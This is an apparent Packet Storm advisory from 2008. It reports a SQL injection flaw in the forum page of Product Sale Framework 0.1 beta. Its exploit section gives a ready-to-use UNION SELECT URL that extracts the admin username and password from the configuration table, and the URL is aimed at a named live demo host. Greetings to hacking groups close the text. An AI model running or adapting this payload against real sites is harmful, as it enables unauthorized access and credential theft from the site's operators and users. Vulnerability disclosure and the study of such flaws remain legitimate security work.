Product Sale Framework 0.1b SQL Injection

2008-12-09T00:00:00
ID PACKETSTORM:72730
Type packetstorm
Reporter b3hz4d
Modified 2008-12-09T00:00:00

Description

                                        
                                            ` +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++  
+ +  
+ Product Sale Framework sql injection Vulnerability +  
+ +  
+ Discovered by b3hz4d +  
+ +  
+ WwW.DeltaHacking.Net +  
+ +  
+ +  
+ +  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
APA Center of Yazd University   
(https://www.ircert.cc)   
  
  
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)  
DATE : 06 Dec 2008  
SITE : WwW.DeltaHacking.Net  
CONTACT: behzad_sh_66@yahoo.com  
  
#####################################################  
  
APPLICATION : Product Sale Framework v0.1 beta  
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip  
VENDOR : http://www.productsaleframework.com  
DEMO (links) : http://www.productsaleframework.com  
  
#####################################################  
  
  
[+] vuln :   
customer.forumtopic.php  
  
vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:  
  
http://www.productsaleframework.com/  
  
[+] Exploit :   
Admin Username and Password:  
  
http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb  
  
  
##########################################################################################################  
  
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #  
  
##########################################################################################################  
  
`